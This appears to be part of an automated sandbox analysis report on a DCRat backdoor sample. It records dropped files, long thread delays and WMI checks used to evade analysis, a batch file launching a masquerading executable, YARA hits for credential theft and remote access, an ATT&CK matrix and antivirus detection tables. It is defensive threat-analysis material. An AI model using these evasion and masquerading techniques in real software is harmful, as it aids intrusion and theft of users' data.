                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ZeaApOeg.log
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exe Dropped PE file which has not been started: C:\Users\user\Desktop\nxFpFSuh.log
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ejzRghnX.log
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exe Dropped PE file which has not been started: C:\Users\user\Desktop\DyXMTSsE.log
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Dropped PE file which has not been started: C:\Users\user\Desktop\mEXomrcz.log
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Dropped PE file which has not been started: C:\Users\user\Desktop\gdBhXhQN.log
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Dropped PE file which has not been started: C:\Users\user\Desktop\lyZggEuH.log
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exe Dropped PE file which has not been started: C:\Users\user\Desktop\noipVfbk.log
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Dropped PE file which has not been started: C:\Users\user\Desktop\asIaZkme.log
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Dropped PE file which has not been started: C:\Users\user\Desktop\WgArDiDi.log
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Dropped PE file which has not been started: C:\Users\user\Desktop\HbVuFfcO.log
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Dropped PE file which has not been started: C:\Users\user\Desktop\PvGkFmYz.log
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Dropped PE file which has not been started: C:\Users\user\Desktop\uHWOOpMo.log
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ougxbSJc.log
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Dropped PE file which has not been started: C:\Users\user\Desktop\AlRNHzIf.log
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exe Dropped PE file which has not been started: C:\Users\user\Desktop\HLTcvXUr.log
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exe Dropped PE file which has not been started: C:\Users\user\Desktop\cJayVGAz.log
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exe Dropped PE file which has not been started: C:\Users\user\Desktop\CYBeSaFD.log
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exe Dropped PE file which has not been started: C:\Users\user\Desktop\wYpmLLZJ.log
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exe TID: 1720 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe TID: 7532 Thread sleep time: -30000s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe TID: 7884 Thread sleep time: -29514790517935264s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe TID: 7868 Thread sleep time: -7200000s >= -30000s
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe TID: 7884Thread sleep time: -596156s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe TID: 7884Thread sleep time: -596047s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe TID: 7884Thread sleep time: -595922s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe TID: 7884Thread sleep time: -595813s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe TID: 7884Thread sleep time: -595688s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe TID: 7884Thread sleep time: -595578s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe TID: 7884Thread sleep time: -595469s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe TID: 7884Thread sleep time: -595344s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe TID: 7884Thread sleep time: -595235s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe TID: 7884Thread sleep time: -595110s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe TID: 7884Thread sleep time: -594985s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe TID: 7884Thread sleep time: -594729s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe TID: 7884Thread sleep time: -594547s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe TID: 7884Thread sleep time: -594434s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe TID: 7884Thread sleep time: -594325s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe TID: 7884Thread sleep time: -594219s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                          Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                          Source: C:\Windows\System32\PING.EXE Last function: Thread delayed
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exe File Volume queried: C:\ FullSizeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe File Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exe Code function: 0_2_00007FFAAC51D59A GetSystemInfo,0_2_00007FFAAC51D59A
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Thread delayed: delay time: 30000
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Thread delayed: delay time: 600000
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Thread delayed: delay time: 599875
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Thread delayed: delay time: 599766
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Thread delayed: delay time: 599641
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Thread delayed: delay time: 599531
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Thread delayed: delay time: 599422
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Thread delayed: delay time: 599313
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Thread delayed: delay time: 599188
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Thread delayed: delay time: 599063
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Thread delayed: delay time: 598907
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Thread delayed: delay time: 598782
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Thread delayed: delay time: 598657
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Thread delayed: delay time: 598532
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Thread delayed: delay time: 598407
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Thread delayed: delay time: 598282
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Thread delayed: delay time: 3600000
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Thread delayed: delay time: 598157
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Thread delayed: delay time: 598047
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Thread delayed: delay time: 597938
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Thread delayed: delay time: 597828
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Thread delayed: delay time: 597719
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Thread delayed: delay time: 597609
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Thread delayed: delay time: 597500
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Thread delayed: delay time: 597391
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Thread delayed: delay time: 597281
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Thread delayed: delay time: 597172
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Thread delayed: delay time: 597062
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Thread delayed: delay time: 596953
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Thread delayed: delay time: 596844
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Thread delayed: delay time: 596734
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Thread delayed: delay time: 596625
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Thread delayed: delay time: 596516
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Thread delayed: delay time: 596391
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Thread delayed: delay time: 596266
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Thread delayed: delay time: 596156
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Thread delayed: delay time: 596047
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Thread delayed: delay time: 595922
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Thread delayed: delay time: 595813
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Thread delayed: delay time: 595688
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Thread delayed: delay time: 595578
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Thread delayed: delay time: 595469
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Thread delayed: delay time: 595344
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Thread delayed: delay time: 595235
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Thread delayed: delay time: 595110
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Thread delayed: delay time: 594985
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Thread delayed: delay time: 594729
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Thread delayed: delay time: 594547
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Thread delayed: delay time: 594434
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Thread delayed: delay time: 594325
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Thread delayed: delay time: 594219
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exe File opened: C:\Users\user\AppData\Local\Temp
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exe File opened: C:\Users\user
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exe File opened: C:\Users\user\AppData\Local
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exe File opened: C:\Users\user\Documents\desktop.ini
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exe File opened: C:\Users\user\AppData
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exe File opened: C:\Users\user\Desktop\desktop.ini
                          Source: A5EbyKyjhV.exe, 00000000.00000002.1305830732.000000001C9FC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: DZNTXHJCUWXUTqOrRrGotfqdMP.exe, 0000000C.00000002.2494667717.0000000000D60000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exe Process information queried: ProcessInformation
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exe Code function: 0_2_00007FFAAC6E6CA9 rdtsc 0_2_00007FFAAC6E6CA9
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exe Process token adjusted: Debug
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Process token adjusted: Debug
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exe Memory allocated: page read and write | page guard
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\kAhb7GGyxn.bat"
                          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                          Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe "C:\Program Files (x86)\windows sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe"
                          Source: DZNTXHJCUWXUTqOrRrGotfqdMP.exe, 0000000C.00000002.2496136619.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, DZNTXHJCUWXUTqOrRrGotfqdMP.exe, 0000000C.00000002.2496136619.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exe Queries volume information: C:\Users\user\Desktop\A5EbyKyjhV.exe VolumeInformation
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                          Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Queries volume information: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                          Stealing of Sensitive Information

                          Source: Yara match File source: A5EbyKyjhV.exe, type: SAMPLE
                          Source: Yara match File source: 0.0.A5EbyKyjhV.exe.fc0000.0.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 0000000C.00000002.2496136619.000000000319D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: 0000000C.00000002.2496136619.0000000002EB6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: 00000000.00000000.1242745024.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara match File source: Process Memory Space: A5EbyKyjhV.exe PID: 6356, type: MEMORYSTR
                          Source: Yara match File source: Process Memory Space: DZNTXHJCUWXUTqOrRrGotfqdMP.exe PID: 7528, type: MEMORYSTR
                          Source: Yara match File source: C:\Recovery\RuntimeBroker.exe, type: DROPPED
                          Source: Yara match File source: C:\Program Files (x86)\Reference Assemblies\DZNTXHJCUWXUTqOrRrGotfqdMP.exe, type: DROPPED

                          Remote Access Functionality

                          Source: Yara match File source: A5EbyKyjhV.exe, type: SAMPLE
                          Source: Yara match File source: 0.0.A5EbyKyjhV.exe.fc0000.0.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 0000000C.00000002.2496136619.000000000319D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: 0000000C.00000002.2496136619.0000000002EB6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: 00000000.00000000.1242745024.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara match File source: Process Memory Space: A5EbyKyjhV.exe PID: 6356, type: MEMORYSTR
                          Source: Yara match File source: Process Memory Space: DZNTXHJCUWXUTqOrRrGotfqdMP.exe PID: 7528, type: MEMORYSTR
                          Source: Yara match File source: C:\Recovery\RuntimeBroker.exe, type: DROPPED
                          Source: Yara match File source: C:\Program Files (x86)\Reference Assemblies\DZNTXHJCUWXUTqOrRrGotfqdMP.exe, type: DROPPED
                          Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                          Gather Victim Identity Information | 1 Scripting | Valid Accounts | 141 Windows Management Instrumentation | 1 Scripting | 12 Process Injection | 132 Masquerading | OS Credential Dumping | 341 Security Software Discovery | Remote Services | 11 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                          Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service
                          Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 251 Virtualization/Sandbox Evasion | Security Account Manager | 251 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 11 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                          Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 12 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
                          Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Remote System Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                          Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 21 Obfuscated Files or Information | Cached Domain Credentials | 1 System Network Configuration Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                          DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Software Packing | DCSync | 2 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                          Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | 135 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                          Source | Detection | Scanner | Label | Link
                          A5EbyKyjhV.exe | 74% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat |
                          A5EbyKyjhV.exe | 100% | Avira | HEUR/AGEN.1309961 |
                          A5EbyKyjhV.exe | 100% | Joe Sandbox ML | |
                          Source | Detection | Scanner | Label | Link
                          C:\Program Files (x86)\Reference Assemblies\DZNTXHJCUWXUTqOrRrGotfqdMP.exe | 100% | Avira | HEUR/AGEN.1309961 |
                          C:\Program Files (x86)\Reference Assemblies\DZNTXHJCUWXUTqOrRrGotfqdMP.exe | 100% | Avira | HEUR/AGEN.1309961 |
                          C:\Users\user\Desktop\HbVuFfcO.log | 100% | Avira | HEUR/AGEN.1362695 |
                          C:\Program Files (x86)\Reference Assemblies\DZNTXHJCUWXUTqOrRrGotfqdMP.exe | 100% | Avira | HEUR/AGEN.1309961 |
                          C:\Users\user\Desktop\OsAKJQVe.log | 100% | Avira | HEUR/AGEN.1362695 |
                          C:\Recovery\RuntimeBroker.exe | 100% | Avira | HEUR/AGEN.1309961 |
                          C:\Users\user\Desktop\PjdKZeCh.log | 100% | Avira | TR/PSW.Agent.qngqt |
                          C:\Users\user\Desktop\SRkiCrbU.log | 100% | Avira | HEUR/AGEN.1300079 |
                          C:\Users\user\AppData\Local\Temp\kAhb7GGyxn.bat | 100% | Avira | BAT/Delbat.C |
                          C:\Users\user\Desktop\PvGkFmYz.log | 100% | Avira | TR/PSW.Agent.qngqt |
                          C:\Users\user\Desktop\EZjMkwXT.log | 100% | Avira | HEUR/AGEN.1300079 |
                          C:\Program Files (x86)\Reference Assemblies\DZNTXHJCUWXUTqOrRrGotfqdMP.exe | 100% | Joe Sandbox ML | |
                          C:\Program Files (x86)\Reference Assemblies\DZNTXHJCUWXUTqOrRrGotfqdMP.exe | 100% | Joe Sandbox ML | |
                          C:\Users\user\Desktop\HbVuFfcO.log | 100% | Joe Sandbox ML | |
                          C:\Program Files (x86)\Reference Assemblies\DZNTXHJCUWXUTqOrRrGotfqdMP.exe | 100% | Joe Sandbox ML | |
                          C:\Users\user\Desktop\OsAKJQVe.log | 100% | Joe Sandbox ML | |
                          C:\Recovery\RuntimeBroker.exe | 100% | Joe Sandbox ML | |
                          C:\Users\user\Desktop\PjdKZeCh.log | 100% | Joe Sandbox ML | |
                          C:\Users\user\Desktop\SRkiCrbU.log | 100% | Joe Sandbox ML | |
                          C:\Users\user\Desktop\AlRNHzIf.log | 100% | Joe Sandbox ML | |
                          C:\Users\user\Desktop\PvGkFmYz.log | 100% | Joe Sandbox ML | |
                          C:\Users\user\Desktop\EZjMkwXT.log | 100% | Joe Sandbox ML | |
                          C:\Program Files (x86)\Reference Assemblies\DZNTXHJCUWXUTqOrRrGotfqdMP.exe | 74% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat |
                          C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe | 74% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat |
                          C:\ProgramData\Adobe\DZNTXHJCUWXUTqOrRrGotfqdMP.exe | 74% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat |
                          C:\Recovery\RuntimeBroker.exe | 74% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat |
                          C:\Users\user\Desktop\AlRNHzIf.log | 8% | ReversingLabs | |
                          C:\Users\user\Desktop\CYBeSaFD.log | 8% | ReversingLabs | |
                          C:\Users\user\Desktop\DyXMTSsE.log | 21% | ReversingLabs | |
                          C:\Users\user\Desktop\EZjMkwXT.log | 17% | ReversingLabs | |
                          C:\Users\user\Desktop\HLTcvXUr.log | 29% | ReversingLabs | |
                          C:\Users\user\Desktop\HSyuVsJS.log | 12% | ReversingLabs | |
                          C:\Users\user\Desktop\HbVuFfcO.log | 17% | ReversingLabs | |
                          C:\Users\user\Desktop\JMBKMsmH.log | 25% | ReversingLabs | |
                          C:\Users\user\Desktop\JiQSSPWn.log | 4% | ReversingLabs | |
                          C:\Users\user\Desktop\MYHJZLWg.log | 12% | ReversingLabs | |
                          C:\Users\user\Desktop\OsAKJQVe.log | 17% | ReversingLabs | |
                          C:\Users\user\Desktop\PWlCEuly.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.Whispergate |
                          C:\Users\user\Desktop\PjdKZeCh.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                          C:\Users\user\Desktop\PvGkFmYz.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                          C:\Users\user\Desktop\RunsezZZ.log | 38% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
                          C:\Users\user\Desktop\SHQSLHwr.log | 38% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
                          C:\Users\user\Desktop\SRkiCrbU.log | 25% | ReversingLabs | |
                          C:\Users\user\Desktop\UswiSVHk.log | 8% | ReversingLabs | |
                          C:\Users\user\Desktop\WgArDiDi.log | 4% | ReversingLabs | |
                          C:\Users\user\Desktop\XMlAJXRO.log | 25% | ReversingLabs | |
                          C:\Users\user\Desktop\ZPYieGWJ.log | 25% | ReversingLabs | |
                          C:\Users\user\Desktop\ZeaApOeg.log | 25% | ReversingLabs | |
                          C:\Users\user\Desktop\asIaZkme.log | 21% | ReversingLabs | |
                          C:\Users\user\Desktop\cJayVGAz.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
                          C:\Users\user\Desktop\ejzRghnX.log | 21% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
                          C:\Users\user\Desktop\gdBhXhQN.log | 17% | ReversingLabs | |
                          C:\Users\user\Desktop\gzRpdDAs.log | 21% | ReversingLabs | |
